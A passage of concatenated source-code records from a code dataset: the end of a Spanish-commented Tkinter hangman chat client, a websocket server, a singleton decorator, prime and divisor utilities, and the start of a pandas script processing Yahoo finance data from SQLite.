)\n message = msg.decode()\n tokens = message.split()\n #print(message + \" DEL SERVER\") #Para identificar los mensajes del servdidor\n except ConnectionResetError:\n print(\"Error del hilo\")\n message = messagebox.showerror(\"Error de Conexión!\" , \"No se logró una conexión...\")\n break\n if tokens[0] == 'CNTR' :\n counter = tokens[1]\n if counter == '6':\n canvas.delete(\"all\")\n canvas.create_image(175,125, image = img1 ) \n if counter == '5':\n canvas.create_image(175,125, image = img2 )\n if counter == '4':\n canvas.create_image(175,125, image = img3 )\n if counter == '3':\n canvas.create_image(175,125, image = img4 )\n if counter == '2':\n canvas.create_image(175,125, image = img5 )\n if counter == '1':\n canvas.create_image(175,125, image = img6 )\n if counter == '0':\n canvas.create_image(175,125, image = img7 )\n if counter == 'W':\n canvas.create_image(175,125, image = img8 )\n elif tokens[0] == 'SETWRD':\n #print(\"MANDE SETWORD\") #Para debugging\n block.delete(1.0 , 'end')\n block.insert(tk.INSERT , tokens[1])\n elif tokens[0] == 'SETWRD2':\n check_set(tokens[2])\n #print(\"MANDE SETWORD2\") #debugging\n block.delete(1.0 , 'end')\n block.insert(tk.INSERT , tokens[1])\n elif tokens[0] == 'UPDATEWRD':\n check_set(tokens[2])\n #print(\"MANDE UDPATE\") #debugging\n actualwrd = tokens[1]\n elif tokens[0] == 'RLET':\n global used_bar\n if(used_bar == 'False'):\n usedletter.delete(1.0 , 'end')\n used_bar = 'True'\n #print(\"MANDE RLET\") #debugging\n letter = tokens[1].upper()\n usedletter.insert(tk.INSERT , letter )\n elif message != \"QUITCOMM\":\n #Imprimimos lo que quede en el chat\n text.insert(tk.INSERT , message)\n text.see(tk.END)\n else:\n quit = True\n print(\"Hilo terminado\")\n\n#---------------------------------------------------------------------------------\n# Esta función se ejecutará cuando des click en el botón 'Enviar' ya que hayas ingresado un nombre\n# Conecta al cliente con el servidor.\n#---------------------------------------------------------------------------------\ndef submit():\n global name\n userName = user.get()\n name = userName\n if len(userName) > 0: \n try:\n clientsock.sendto(userName.encode(), (servername , serverport))\n except ConnectionResetError:\n print(\"Error de conexión!\")\n root.destroy()\n menu_w.destroy()\n else:\n disp_name_error()\n\n#---------------------------------------------------------------------------------\n# Esta funcion se ejecutará cuando des 'Enter' (en el teclado) ya que hayas ingresado un nombre de usuario.\n# Conecta al cliente con el servidor\n#---------------------------------------------------------------------------------\ndef submitenter(event):\n global name\n userName = user.get()\n name = userName\n if len(userName) > 0: \n try:\n clientsock.sendto( userName.encode() , (servername , serverport) )\n except ConnectionResetError:\n print(\"Error de conexión!\")\n root.destroy()\n menu_w.destroy()\n else:\n disp_name_error()\n\n#---------------------------------------------------------------------------------\n# Esta función enviará los mensajes escritos en la ventana de chat cuando le des\n# click al botón 'Enviar'.\n# Estos mensajes serán broadcasteados a todos los demás jugadores.\n# Los mensajes son enviados con la forma [jugador]: 'mensaje' \n# Si no hay nada en la caja de texto, no se envia nada.\n#---------------------------------------------------------------------------------\ndef chatsend():\n global name \n message = msg.get()\n if len(message) > 0: \n line = \"[\" + name + \"]: \" + message + \"\\n\"\n clientsock.sendto( line.encode() , (servername , serverport) )\n msg.delete(0 , 'end')\n\n#---------------------------------------------------------------------------------\n# Esta función enviará los mensajes escritos en la ventana de chat cuando presiones\n# 'enter'.\n# Estos mensajes serán broadcasteados a todos los demás jugadores.\n# Los mensajes son enviados con la forma [jugador]: 'mensaje' \n# Si no hay nada en la caja de texto, no se envia nada.\n#---------------------------------------------------------------------------------\ndef enter(event):\n global name\n message = msg.get()\n if len(message) > 0: \n line = \"[\" + name + \"]: \" + message + \"\\n\"\n clientsock.sendto( line.encode() , (servername , serverport) )\n msg.delete(0 , 'end')\n\n#---------------------------------------------------------------------------------\n# Error catching por si el usuario no pone un nombre de usuario\n#---------------------------------------------------------------------------------\ndef disp_name_error():\n messagebox.showerror(\"Sin nombre!\" , \"Por favor, ingresa tu nombre\\n\")\n\n#---------------------------------------------------------------------------------\n# Si un jugador decide salir del juego envia un comando al server con la forma\n# '[jugador]: ^q'\n# El comando '^q' es cachado y ejecutado por el server \n#---------------------------------------------------------------------------------\ndef quitchat():\n line = \"[\" + name + \"]: ^q \\n\"\n clientsock.sendto( line.encode() , (servername , serverport) )\n chat.destroy()\n\n#---------------------------------------------------------------------------------\n# Esta función es el pop up para que el usuario ingrese una palabra para adivinar\n#---------------------------------------------------------------------------------\ndef set_word():\n global wordwindow \n global input\n wordwindow = tk.Tk()\n wordwindow.title(\"Escoge una palabra difícil (Pero bien escrita!)\")\n wordwindow.minsize(width = 200, height =50)\n wordlabel = tk.Label( wordwindow, text = \"Ingresa tu palabra: \")\n wordlabel.pack(side = tk.LEFT)\n input = tk.Entry( wordwindow )\n input.pack(side = tk.LEFT)\n button = tk.Button( wordwindow , text = \"Poner\", width = 20 , command = wordsend )\n button.pack(side = tk.LEFT)\n wordwindow.mainloop()\n\n#---------------------------------------------------------------------------------\n# Esta función se ejecuta al darle click en 'Poner' en la 'wordwindow' (pop up arriba)\n# Envía el comando al server con la forma '[player]: SETWRD palabra'\n# Aquí modificamos 'word_set' Si es falso no hay palabra colocada y puedes ponerla\n# Si es verdadero muestra que no es tu turno para ponerla y que ya hay una.\n#---------------------------------------------------------------------------------\ndef wordsend():\n global block , word_set\n word = input.get()\n tokens = word.split()\n if (len(tokens[0]) > 0):\n if word_set == 'False': \n print(\"Boton picado\")\n block.delete(1.0 , 'end')\n block.insert(tk.INSERT , tokens[0])\n command = \"[\" + name + \"]: SETWRD \" + tokens[0] \n clientsock.sendto( command.encode() , (servername , serverport))\n else:\n messagebox.showerror(\"Palabra ya puesta!!\" , \"No es tu turno de poner una palabra, espera tu turno!\")\n wordwindow.destroy()\n\n#---------------------------------------------------------------------------------\n# Esta función es el pop up para que el jugador adivine la palabra completa\n#---------------------------------------------------------------------------------\n\ndef guess_word():\n global guess \n global guessinput\n guess = tk.Tk()\n guess.title(\"¿Te la sabes?\")\n tk.Label(guess , text = \"Intento: \" ).pack(side = tk.LEFT)\n guessinput = tk.Entry( guess )\n guessinput.pack( side = tk.LEFT)\n tk.Button(guess , text = \"Será?...\" , command = send_guess).pack(side = tk.LEFT)\n guess.mainloop()\n\n#---------------------------------------------------------------------------------\n# Esta función es ejecutada cuando le das click al botón 'Será?...' del pop up para\n# adivinar de arriba\n# Envia el comando al server con la forma '[jugador]: GUESSWRD palabra'\n#---------------------------------------------------------------------------------\ndef send_guess():\n gword = guessinput.get()\n tokens = gword.split()\n if( len(tokens[0]) > 0 ):\n command = \"[\" + name + \"]: GUESSWRD \" + tokens[0] \n clientsock.sendto( command.encode() , (servername , serverport) )\n guess.destroy()\n\n#---------------------------------------------------------------------------------\n# Esta función es para que el jugador adivine una letra (abre un pop up)\n#---------------------------------------------------------------------------------\ndef guess_letter():\n global letter \n global letterinput\n letter = tk.Tk()\n letter.title(\"Adivina por letra\")\n tk.Label(letter , text = \"letra: \" ).pack(side = tk.LEFT)\n letterinput = tk.Entry( letter , width = 20 )\n letterinput.pack( side = tk.LEFT)\n tk.Button(letter , text = \"¿Estará?...\" , command = send_letter).pack(side = tk.LEFT)\n letter.mainloop()\n\n#---------------------------------------------------------------------------------\n# Esta función es ejecutada cuando le das en el botón '¿Estará?...' del pop up de\n# arriba. Envia el comando al server con la forma '[jugador]: RLET letra'\n# Antes de enviar el comando checa si solo metió un caracter para evitar errores.\n# No checa si es una letra, solo si es un solo caracter. (Por las ñ y acentos)\n#---------------------------------------------------------------------------------\ndef send_letter():\n gletter = letterinput.get()\n tokens = gletter.split()\n if( len(tokens[0]) == 1 ):\n command = \"[\" + name + \"]: RLET \" + tokens[0] \n clientsock.sendto( command.encode() , (servername , serverport) )\n letterinput.delete(0 , 'end')\n\n#---------------------------------------------------------------------------------\n# Esta función checa y coloca el indicador de que una palabra fue puesta y si la\n# barra de letras usadas debe ser limpiada\n#---------------------------------------------------------------------------------\ndef check_set( word ):\n global used_bar, word_set\n word_set = word\n if (word == 'False'):\n used_bar = 'False'\n\ndef randomwrd():\n if word_set == 'False': \n command = \"[\" + name + \"]: RANDOMWRD\" \n clientsock.sendto(command.encode() , (servername , serverport))\n else:\n messagebox.showerror(\"Palabra ya puesta!!\" , \"No es tu turno de poner una palabra, espera tu turno!\")\n\ndef connect():\n #Para la primera ventana. Pide un nombre de usuario\n global root , user\n root = tk.Tk()\n root.title(\"Bienvenido!\")\n welcomelabel = tk.Label(root , text = \"Bienvenido a la sala de chat!!\")\n welcomelabel.grid(row = 1 , columnspan = 3)\n userlabel = tk.Label(root , text = \"Nombre:\")\n userlabel.grid(row = 3, column = 0)\n user = tk.Entry(root)\n user.bind(\"\" , submitenter)\n user.grid(row = 3 , column = 1)\n submit_button = tk.Button(root, text = \"Enviar\", command = submit)\n submit_button.grid(row = 3 , column = 2)\n root.mainloop()\n\ndef menu():\n global menu_w\n menu_w = tk.Tk()\n menu_w.title(\"Bienvenido a Captious\")\n menu_w.maxsize(width = 305 , height = 230)\n menu_w.geometry(\"305x230+%d+%d\" % ((500) , (250)) )\n img = tk.PhotoImage( file = \"images/welcome.png\")\n welcome_canvas = tk.Canvas(menu_w , bg = 'blue' , width = 300 , height = 200 )\n welcome_canvas.pack(side = tk.TOP)\n welcome_canvas.create_image( 152 , 102 , image = img)\n play = tk.Button(menu_w , command = connect)\n play.pack(side = tk.LEFT)\n play.config(text = \"Jugar\", width = 8)\n help = tk.Button(menu_w , command = disp_help )\n help.pack(side = tk.LEFT)\n help.config(text = \"Reglas\", width = 8)\n esc = tk.Button(menu_w , command = quit_game)\n esc.pack(side = tk.LEFT)\n esc.config(text = \"Salir\", width = 8)\n menu_w.mainloop()\n\ndef disp_help():\n messagebox.showinfo(\"Ayuda\" , \"Reglas del juego:\\n\\n\" +\n \"-El punto del juego es adivinar la palabra puesta por un jugador\" +\n \" antes de que te quedes sin intentos.\\n\\n\" +\n \"-Un jugador tendrá la opción de poner una palabra propia \" +\n \"o de escoger una palabra aleatoria de la base de datos.\\n\\n\" +\n \"-Si es tu turno de adivinar, puedes dar click en 'Adivinar Letra' para intentar con una letra especifica\" + \n \" o puedes dar click en 'Adivinar Palabra' si crees saber la\" +\n \" palabra completa.\\n\\n\" +\n \"-Si adivinas la palabra, ganarás la ronda y una nueva palabra puede ser puesta.\\n\\n\" +\n \"-Si te quedas sin intentos quedarás AHORCADO y el juego termina.\\n\\n\" +\n \"-CASTIGOS:\\n-1 por una letra mal adivinada.\\n-2 por una palabra mal adivinada.\\n\\n\")\n\ndef quit_game():\n sys.exit(0)\n\n#---------------------------------------------------------------------\nclientsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nclientsock.bind((servername , port))\nmenu()\nuserlength = len(name)\nif userlength > 0:\n global msg, canvas, img1 , img2 , img3 , img4 , img5 , img6 , img7\n chat = tk.Tk()\n img1 = tk.PhotoImage(file = 'images/hng1.png') \n img2 = tk.PhotoImage(file = 'images/hng2.png') \n img3 = tk.PhotoImage(file = 'images/hng3.png') \n img4 = tk.PhotoImage(file = 'images/hng4.png') \n img5 = tk.PhotoImage(file = 'images/hng5.png')\n img6 = tk.PhotoImage(file = 'images/hng6.png') \n img7 = tk.PhotoImage(file = 'images/hng7.png') \n img8 = tk.PhotoImage(file = 'images/hng8.png')\n\n chat.title(\"Captious Chat\")\n chat.minsize( width = 735 , height = 330 )\n chat.geometry(\"740x450+%d+%d\" % ((300) , (250)) )\n\n hangman = tk.Label(chat , text = \"Bienvenido a Captious, \" + name + \"!!\\n\" , font = (\"Arial\" , 15) )\n hangman.pack(side = tk.TOP)\n\n topframe = tk.Frame(chat , bg = \"green\")\n topframe.pack( side = tk.TOP)\n\n bottomframe = tk.Frame(chat , height = 30)\n bottomframe.pack( side = tk.BOTTOM )\n\n sideframe = tk.Frame(topframe , bg = \"green\" , bd = 6 , width = 80 , height = 40)\n sideframe.pack(side = tk.RIGHT)\n\n s = tk.Scrollbar(topframe)\n s.pack(side = tk.RIGHT , fill = tk.Y)\n\n chatlabel = tk.Label(bottomframe , text = \"Tu: \")\n chatlabel.pack( side = tk.LEFT)\n\n msg = tk.Entry(bottomframe , width = 50)\n msg.bind(\"\" , enter)\n msg.pack(side = tk.LEFT)\n\n chatbutton = tk.Button(bottomframe, text = \"Enviar\" , command = chatsend , height = 20 , width = 20)\n chatbutton.pack(side = tk.LEFT)\n\n quitbutton = tk.Button(bottomframe, text = \"Salir\" , command = quitchat , height = 20 , width = 10)\n quitbutton.pack(side = tk.BOTTOM)\n\n rt = threading.Thread(target = recieveMsg , args = (\"Thread\" , clientsock , topframe))\n rt.start()\n\n block = tk.Text( sideframe , width = 24 , height = 1 , bg = \"grey\")\n block.grid( row = 1 , column = 1 , stick = tk.E)\n block.insert(tk.INSERT , \"Sin palabra\")\n\n setbutton = tk.Button(sideframe , text = \"Poner Palabra\", command = set_word)\n setbutton.grid(row = 1 , column = 0 , stick = tk.W)\n\n guessbutton = tk.Button(sideframe , text = \"Adivinar Palabra\", command = guess_word)\n guessbutton.grid( row = 2 , column = 0 , stick = tk.W)\n\n letter = tk.Button(sideframe, text = \"Adivinar Letra\", command = guess_letter)\n letter.grid(row = 3 , column = 0 , stick = tk.W)\n\n randombutton = tk.Button(sideframe , text = \"Palabra Aleatoria\" , command = randomwrd )\n randombutton.grid( row = 3 , column = 1 , stick = tk.E)\n\n usedletter = tk.Text(sideframe , width = 40, height = 1 , bg = \"grey\")\n usedletter.grid(row = 4 , columnspan = 2 , stick = tk.E)\n usedletter.insert(tk.INSERT , \"Las letras usadas aparecerán aquí...\")\n\n canvas = tk.Canvas(sideframe ,width = 350 , height = 250 )\n canvas.grid( row = 5 , columnspan = 2)\n \n #El número 2 representa donde está el centro de la imagen para colocarlo en el canvas\n canvas.create_image(175,125, image = img1)\n chat.mainloop()\n\nrt.join()\nclientsock.close()\n","sub_path":"CaptiousClient.py","file_name":"CaptiousClient.py","file_ext":"py","file_size_in_byte":18507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"166001901","text":"import asyncio\nimport websockets\nimport json\n\n# Imports of Components\nfrom server.components.components import greeting\nfrom server.components.components import main\nfrom server.components.components import input_temp_preference\n\n# Custom-Imports\nfrom server import constants\nfrom server.store import Store\n\n\n\"\"\"\n--> {\"func\": \"\", \"id\": , \"payload\": {}}\n<-- {\"parent\": \"\", \"id\": , \"html\": \"\"}\n\"\"\"\n\nclass Server:\n def __init__(self, store):\n self.store = store\n\n def get_port(self):\n #return os.getenv('WS_PORT', '8765')\n return constants.SERVER_BINDING_PORT\n\n def get_host(self):\n #return os.getenv('WS_HOST', 'localhost')\n return constants.SERVER_BINDING_INTERFACE\n\n def start(self):\n return websockets.serve(self.handler, self.get_host(), self.get_port())\n\n async def handler(self, websocket, path):\n async for message in websocket:\n print('server received :', message)\n #await websocket.send(message)\n data = json.loads(message)\n\n if data['func'] in constants.PROCEDURES:\n\n if data['func'] == 'MAIN':\n print('> Greeting Message erhalten. > ' + message)\n response_dict = {\n 'parent': \"root\",\n 'id': data['id'],\n 'html': main(self.store.getall())\n }\n await websocket.send(json.dumps(response_dict))\n\n elif data['func'] == 'SHOW_VIEW_ADD_PREFERENCE':\n print('> SHOW_VIEW_ADD_PREFERENCE > ' + message)\n if data['payload']:\n # Wir haben Payload enthalten, was machen wir nun damit?\n print(f'> > {data[\"payload\"]}')\n for k in data['payload'].keys():\n self.store.set(k, data['payload'][k])\n print('> > > k: ' + k + ' - v: ' + data['payload'][k])\n response_dict = {\n 'parent': \"content\",\n 'id': data['id'],\n 'html': input_temp_preference(self.store.getall())\n }\n await websocket.send(json.dumps(response_dict))\n \"\"\"\n elif data['func'] == 'LISTE':\n print('> Laden der Liste > ' + message)\n response_dict = {\n 'parent': \"liste\",\n 'id': data['id'],\n 'html': greeting([\"Alpha\", \"Beta\", \"Gamma\"])\n }\n await websocket.send(json.dumps(response_dict))\n \"\"\"\n def get_dom(self):\n return\n\n\nif __name__ == '__main__':\n store = Store()\n store.set('temperature', 20)\n store.set('humidity', 45.5)\n\n ws = Server(store)\n asyncio.get_event_loop().run_until_complete(ws.start())\n asyncio.get_event_loop().run_forever()","sub_path":"server/ws_s.py","file_name":"ws_s.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"356103731","text":"\"\"\"\n Module contains decerator which is an implementation of singleton design pattern.\n\"\"\"\n\nfrom functools import wraps\n\n__instances = {}\n\"\"\"List of class instances created with singleton decorator.\"\"\"\n\n\ndef singleton(cls):\n \"\"\"Decorator for singleton design pattern. Function decorates a class and stores its instance to a list of instances\n from which is later returned if the class is called again.\n\n Args:\n cls: Decorated class\n\n Returns:\n Instance of a decorated class\n \"\"\"\n @wraps(cls)\n def get_instance(*args, **kwargs):\n instance = __instances.get(cls, None)\n if not instance:\n instance = cls(*args, **kwargs)\n __instances[cls] = instance\n return instance\n return get_instance\n","sub_path":"selenium_generator/base/singleton.py","file_name":"singleton.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"12690052","text":"\"\"\"Some functions that will help dealing with division and primes.\n\"\"\"\n\ndef isPrime(n):\n \"\"\"(bool) Returns true if n is a prime integer.\"\"\"\n if n < 2:\n return False\n elif n == 2:\n return True\n if n % 2 == 0:\n return False\n for x in range(3, int(n**0.5 + 1), 2):\n if n % x == 0:\n return False\n return True\n\ndef Eratos(limit):\n \"\"\"Returns a list of prime integers, where 0 < x <= limit.\n Code based on the Sieve of Eratosthenes.\"\"\"\n if limit < 2: return []\n \n primes = {}\n for n in range(2, limit + 1): primes[n] = True\n\n for n in primes:\n for f in range(n*2, limit + 1, n): primes[f] = False\n return [n for n in primes if primes[n] == True]\n\ndef invEratos(limit):\n \"\"\"Returns list of composite integers where 0 < x <= limit.\n Inverse of Eratos(limit).\"\"\"\n nonprimes = [1]\n if limit < 2: return nonprimes\n\n primes = {}\n for n in range(2, limit + 1): primes[n] = True\n\n for n in primes:\n for f in range(n*2, limit + 1, n): primes[f] = False\n nonprimes.extend([n for n in primes if primes[n] == False])\n return nonprimes\n\ndef primfac(n, form='l'):\n \"\"\"Returns a list or dictionary of n's prime factors.\n\n form='l': 'list' (DEFAULT)\n eg. primfac(72) = [2, 2, 2, 3, 3]\n\n form='d': 'dictionary', such that \n prime factors : exponent of prime factor.\n eg. primeFactorsDict(90) = {2: 1, 3: 2, 5: 1}\n Such that 90 = 2^1 * 3^2 * 5^1\"\"\"\n if form == \"d\" or form == \"D\": factors = {}\n else: factors = []\n\n for div in range(2, int(n**0.5) + 2): # +1 for range(), +1 for ceil round\n while n%div == 0:\n if type(factors) == list:\n factors.append(div)\n else:\n if div not in factors: factors[int(div)] = 1\n else: factors[int(div)] += 1\n n /= div\n if n > 1:\n if type(factors) == list:\n factors.append(int(n))\n else:\n if n not in factors: factors[int(n)] = 1\n else: factors[int(n)] += 1\n return factors\n\ndef divnum(n):\n \"\"\"Returns the number of integers that divide evenly into n.\"\"\"\n product = 1\n for item in primfac(n, form='d').values():\n product *= (item + 1)\n return product\n\ndef divisors(n, inc=True):\n \"\"\"Returns a sorted list of integers that divide evenly\n into n. If inc = True, divisors returns a list oncluding n.\"\"\"\n divs = [x for x in range(1, int(n/2) + 1) if n%x == 0]\n if inc: divs.append(n)\n return divs\n\ndef Collatz(n):\n \"\"\"Returns n's Collatz sequence.\"\"\"\n steps = [n]\n while n > 1:\n if n % 2 == 0: n /= 2\n else: n = (n*3) + 1\n steps.append(int(n))\n return steps\n\ndef GCD(*args):\n \"\"\"Returns the greatest common divisor of any number of numbers.\"\"\"\n if len(args) == 1: return args[0]\n while len(args) > 2: #GCD(a, b, c) = GCD(a, GCD(b, c))\n args.append(GCD(args.pop(), args.pop()))\n\n a, b = args\n while b != 0:\n a, b = b, a%b\n return a\n\ndef LCM(*args):\n \"\"\"Returns the lowest common multiple of any number of numbers.\"\"\"\n if len(args) == 1: return args[0]\n while len(args) > 2: #LCM(a, b, c) = LCM(a, GCD(b, c))\n args.append(LCM(args.pop(), args.pop()))\n\n a, b = args\n return int(a*b / GCD(a, b)) #LCM(a, b) = a*b / GCD(a, b)\n","sub_path":"dwdiv.py","file_name":"dwdiv.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"517283613","text":"'''\r\nCreated on 25 Jul 2017\r\n\r\n@author: Nick\r\n'''\r\n\r\n\r\n\r\n\r\nimport sys\r\nfrom dataOperations import DataOps\r\nimport cRoutines\r\nfrom utils import getPar\r\nimport dataOperations\r\nimport itertools\r\nsys.path.append('C:\\\\Users\\\\Nick\\\\workspace\\\\git\\\\1st iteration')\r\nprint(sys.path)\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom dataCollection.dataUtils import readCSV, writeDB, readTicker, dBaseAction,\\\r\n writeDBv2\r\nfrom _datetime import datetime\r\nfrom dataCollection.downloadData import downloadYahoo\r\nimport time\r\nimport random\r\nimport os\r\nfrom cRoutines import ewma, ewmaCovar\r\nimport gc\r\nimport utils\r\n\r\n\r\n### Full Clean,run periodically (weekly?) if divideneds change adjusted close back in time. Daily reports can use yahoo Daily clean, then full scrub on weekend?\r\nfullClean = True\r\n## Just run corralations once a week, set to Sunday = 6\r\nrunCorr = False\r\n#runCorr = datetime.today().weekday() == 6\r\n\r\nstart_time = time.time()\r\ndBase = 'C:\\\\Users\\\\Nick\\\\Documents\\\\project MONEY\\\\data\\\\PJMdataBase.db'\r\ndBase1 = 'C:\\\\Users\\\\Nick\\\\Documents\\\\project MONEY\\\\data\\\\yahooDaily-postAPIchange.db'\r\n\r\nfundementalFile = 'C:\\\\Users\\\\Nick\\\\Documents\\\\project MONEY\\\\fundementalSymbols.csv'\r\n\r\ntme = datetime.now()\r\nuniqueDates = dBaseAction(dBase1, ''' select distinct timestamp from yahooDaily ''')[0]\r\nuniqueDates1 = dBaseAction(dBase, ''' select distinct timestamp from yahooFundementals ''')[0]\r\ndates = np.unique(np.concatenate((uniqueDates,uniqueDates1))).astype('datetime64[D]')\r\ndates.sort()\r\n\r\ntickersBase = dBaseAction(dBase, ''' select * from tickers ''')[0]\r\ntickersBase1 = dBaseAction(dBase, ''' select * from tickersNew ''')[0]\r\ntickersBase = tickersBase[ ~tickersBase.ticker.isin(tickersBase1.ticker)]\r\n\r\nfundementalTicks = dBaseAction(dBase, ''' select distinct symbol from yahooFundementals ''')[0]\r\ntimeseriesTicks = dBaseAction(dBase1, ''' select distinct ticker from yahooDaily ''')[0]\r\n#cleanTicks = dBaseAction(dBase, ''' select distinct ticker from yahooDailyClean ''')[0]\r\nexchangeMap = dBaseAction(dBase, ''' SELECT * from exchangeMap ''')[0]\r\n\r\nfx = dBaseAction(dBase,''' SELECT timestamp,symbol,last_trade_price_only from yahooFundementals where symbol like \"%=%\" ''')[0]\r\nfx = fx.pivot_table(index = 'timestamp', columns = 'symbol', values = 'last_trade_price_only', aggfunc = sum )\r\nfx = fx.replace('N/A',np.nan)\r\nfxRate = fx.apply(lambda x: x[ x.index == x.last_valid_index()].astype(float)[0])\r\nfxRate = fxRate.replace(np.nan,1)\r\nfx = pd.DataFrame({'symbol':fxRate.index,\r\n 'fx': fxRate.values})\r\nfx = fx[ fx.symbol.apply(lambda x: len(x)) == 5]\r\n## set all multi's to the same level as GBP?\r\nukEx = fx[ fx.symbol == 'GBP=X'].fx.values.astype(float)\r\nfx['ccy'] = fx.symbol.apply(lambda x: x[:3])\r\nfx.fx = 1/fx.fx.astype(float)*ukEx[0]\r\nfx = pd.concat([fx, pd.DataFrame({'ccy':'multi','symbol':'multi','fx':1.0}, index = [0])]).reset_index(drop = True)\r\n\r\ntickers = pd.concat([tickersBase[['category', 'exchange', 'name', 'ticker', 'type']].drop_duplicates().reset_index(drop = True),\\\r\n tickersBase1[['category', 'exchange', 'name', 'ticker', 'type']].drop_duplicates().reset_index(drop = True)]).drop_duplicates().reset_index(drop = True)\r\n\r\ntickers = tickers[tickers.type.isin(['stock', 'etf', 'index', 'mutual_fund','future','warrant','bond','currency'])]\r\ntickers = tickers.drop_duplicates().reset_index(drop = True)\r\ntickers = tickers[['category', 'exchange', 'name', 'ticker', 'type']].drop_duplicates().reset_index(drop = True)\r\ntickExchange = tickers[['ticker','exchange']].drop_duplicates().reset_index(drop = True)\r\ntickExchange = tickExchange.drop_duplicates(subset = 'ticker', keep = 'last')\r\n\r\n#ticksUse = pd.DataFrame(pd.concat([timeseriesTicks.iloc[:,0],fundementalTicks.iloc[:,0], cleanTicks.iloc[:,0], tickers.ticker]).drop_duplicates()).reset_index(drop=True)\r\nticksUse = pd.DataFrame(pd.concat([timeseriesTicks.iloc[:,0],fundementalTicks.iloc[:,0], tickers.ticker]).drop_duplicates()).reset_index(drop=True)\r\n#del( fundementalTicks,cleanTicks,uniqueDates, timeseriesTicks, tickers)\r\ndel( fundementalTicks,uniqueDates, timeseriesTicks, tickers)\r\ngc.collect()\r\n\r\n## Max requests from dataBase is 1000\r\nnPerSample = 1000\r\nnPerSet = 5\r\nsets = int(len(ticksUse)/(nPerSample*nPerSet))\r\n\r\ntotalSeriesYahoo = []\r\n## loop sets\r\n## for each base set, calculate stats etc, then correlations against all remaining sets. \r\n## only do corrs n:len, dont need to do prior as n vs n+1 is covered when doing n, so dont need to do when base is n+1 (except for lag i.e 1 vs lag 2, 2 vs lag 1)\r\n\r\ncleansed = []\r\nstats = []\r\nlogCrossPastUp = []\r\nlogCrossPastDown = []\r\nlogCrossPastUpClimbing = []\r\nlogClimbing = []\r\nlogMomentum = []\r\nlogCrossNowUp = []\r\nlogCrossNowDown = []\r\nlogDecelerateUp = []\r\nlogDecelerateDown = []\r\nbreakOutsUp = []\r\nbreakOutsDown = []\r\n\r\nsizeList = []\r\nkk= pd.Series(dir())\r\nfor jj in range(len(kk)):\r\n sizeList.append(pd.DataFrame({'name':kk[jj],\r\n 'size':sys.getsizeof(eval(kk[jj]))}, index = [0]))\r\n\r\npd.concat(sizeList).sort_values(by = 'size')\r\n\r\nfor i in range(int(sets+1)):\r\n totalSeriesYahoo = []\r\n closePriceData = []\r\n for j in range(nPerSet):\r\n print(str(i+1) + ' of ' + str(int(sets+1)) + ' base - ' + str(j))\r\n tickerSetFilter = ticksUse.iloc[((i*nPerSet+j)*nPerSample):(((i*nPerSet+j)*nPerSample)+min(len(ticksUse)-(i*nPerSet+j)*nPerSample,nPerSample)-1),0].reset_index(drop=True).tolist()\r\n tickerSet = ['\"' + x + '\"' for x in tickerSetFilter]\r\n tickerJoin = ' OR ticker = '.join(tickerSet)\r\n symbolJoin = ' OR symbol = '.join(tickerSet)\r\n \r\n cmd = ''' Select timestamp,symbol,name,stock_exchange,type,last_trade_price_only,open, previous_close, days_high, days_low,volume,earnings_per_share,eps_estimate_current_year,eps_estimate_next_year,eps_estimate_next_quarter,price__to__book,p_to_e_ratio,peg_ratio, price__to__eps_estimate_current_year,price__to__eps_estimate_next_year,market_capitalization, short_ratio from yahooFundementals WHERE symbol = ''' + symbolJoin + ''' '''\r\n closePriceData.append(dBaseAction(dBase, cmd)[0])\r\n \r\n if not fullClean:\r\n try:\r\n cmds = [''' SELECT * from \"yahooDailyClean\" WHERE ticker = ''' + tickerJoin + ''' ''']\r\n timeSeries = dBaseAction(dBase = dBase, readSQL=cmds)[0]\r\n dateFrom = min([timeSeries.timestamp[ timeSeries.ticker == x].max() for x in timeSeries.ticker.unique()])\r\n cleanTicks = timeSeries.ticker.unique()\r\n tickerSet = ['\"' + x + '\"' for x in cleanTicks]\r\n tickerJoin = ' OR ticker = '.join(tickerSet)\r\n cmds = [''' SELECT * from \"yahooDaily\" WHERE ticker = ''' + tickerJoin + ''' ''']\r\n timeSeriesExtra = dBaseAction(dBase = dBase, readSQL=cmds)[0] \r\n timeSeriesExtra = timeSeriesExtra[ timeSeriesExtra.timestamp.astype('datetime64[D]') > np.datetime64(dateFrom)]\r\n missingTicks = np.array(tickerSetFilter)[ ~np.in1d(tickerSetFilter,timeSeries.ticker)].tolist()\r\n tickerSet = ['\"' + x + '\"' for x in missingTicks]\r\n tickerJoin = ' OR ticker = '.join(tickerSet)\r\n except:\r\n timeSeriesExtra = pd.DataFrame()\r\n timeSeries = pd.DataFrame()\r\n \r\n else:\r\n timeSeriesExtra = pd.DataFrame()\r\n cmds = [''' SELECT * from \"yahooDaily\" WHERE ticker = ''' + tickerJoin + ''' ''']\r\n timeSeries = dBaseAction(dBase = dBase1, readSQL=cmds)[0]\r\n \r\n timeSeries = pd.concat([timeSeries, timeSeriesExtra]).reset_index(drop = True) \r\n totalSeriesYahoo.append(timeSeries)\r\n \r\n closePriceData = pd.concat(closePriceData).reset_index(drop =True)\r\n closePriceData = closePriceData[ (closePriceData.last_trade_price_only != 'N/A') & closePriceData.symbol.isin(ticksUse.iloc[:,0].tolist())].reset_index(drop = True)\r\n closePriceData = closePriceData.replace('N/A',np.nan)\r\n closePriceData[closePriceData.columns[~closePriceData.columns.isin(['timestamp','symbol','name','stock_exchange', 'type'])]] = \\\r\n closePriceData[closePriceData.columns[~closePriceData.columns.isin(['timestamp','symbol','name', 'stock_exchange', 'type'])]].astype(float)\r\n closePriceData.timestamp = closePriceData.timestamp.astype('datetime64[D]')\r\n closePriceData = closePriceData.rename(columns = {'days_high':'high','days_low':'low','previous_close':'close','last_trade_price_only':'adj_close'})\r\n\r\n base = pd.concat(totalSeriesYahoo).reset_index(drop = True)\r\n if (base.shape[0] == 0) | (base.ticker.unique().shape[0] > 1):\r\n continue\r\n else:\r\n logi = i\r\n \r\n try:\r\n base = base.replace({None:np.nan,'N/A':np.nan}, regex = 